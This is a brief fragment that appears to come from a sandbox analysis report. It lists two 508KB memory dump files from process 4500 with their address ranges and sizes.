  • memory/4500-169-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-170-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB